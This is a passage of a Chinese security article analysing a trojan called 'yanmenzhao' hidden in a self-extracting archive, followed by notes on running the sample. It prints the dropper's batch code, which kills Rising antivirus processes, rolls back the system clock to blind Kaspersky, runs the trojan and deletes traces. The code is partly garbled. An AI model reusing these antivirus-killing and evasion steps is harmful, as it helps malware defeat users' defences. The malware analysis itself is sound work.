安全实例：遭遇“艳照门”木马

　　上述代码是获取瑞星组件的进程ID并通过knlps.exe结束瑞星的进程。

　　　setdate=%date%
　　date1990-01-01
　　date1990-01-01

　　上述代码是修改系统时间使卡巴监控失效，这句是关键破卡巴查杀的程序流，没这句被杀木马就会被杀。

　　　@echooff&setlocalenableextensions
　　echoWScript.Sleep1000>%temp%.　　mp$$$.vbs
　　set/ai=15
　　:Timeout
　　if%i%==0gotoNext
　　setlocal
　　set/ai=%i%-1
　　cscript//nologo%temp%.　　mp$$$.vbs
　　gotoTimeout
　　gotoEnd

　　上述代码是倒计时等待15秒

　　:Next

　　%systemroot%　　emp1.exe 这个是你木马的名称

　　for %%f in (%temp%.　　mp$$$.vbs*) do del %%f

　　上述代码第二回行就木马名称的解压目录，第三行行是倒计时等待结束后运行木马并删除。

　　　date2007-10-27aaa
　　date%date%aaa

　　上述代码是恢复系统时间(卡巴监控)

　　 RD/S/Q%systemroot%　　emp

　　上述代码的含义是删除临时文件清除痕迹。

　　从上面的分析可以看出该自解压包木马的运行机制是，先通过脚本终结瑞星和卡巴斯基，然后运行真正的木马程序，即1.exe，最后清除痕迹。

　　三、运行病毒

　　1、瑞星被终结

　　分析完毕，然后双击yanmenzhao.exe看看中毒症状。为了分析病毒的运行状况，事先打开了瑞星的“实时监控”和“任务管理器”，以观察病毒运行状态。运行后瑞星没有任何提示，任务栏中的瑞星实时监控图标消失，看来瑞星被终结了。另外，在任务管理中出现了一个cscript.exe进程见图6，很快地闪动，鼠标无法选择结束，大概几秒钟后该进程消失，在进程管理器中有多了2个svchost.exe进程见图7。(笔者在测试前备份了进程表，以前的为5个，多了2个)(图6)(图7)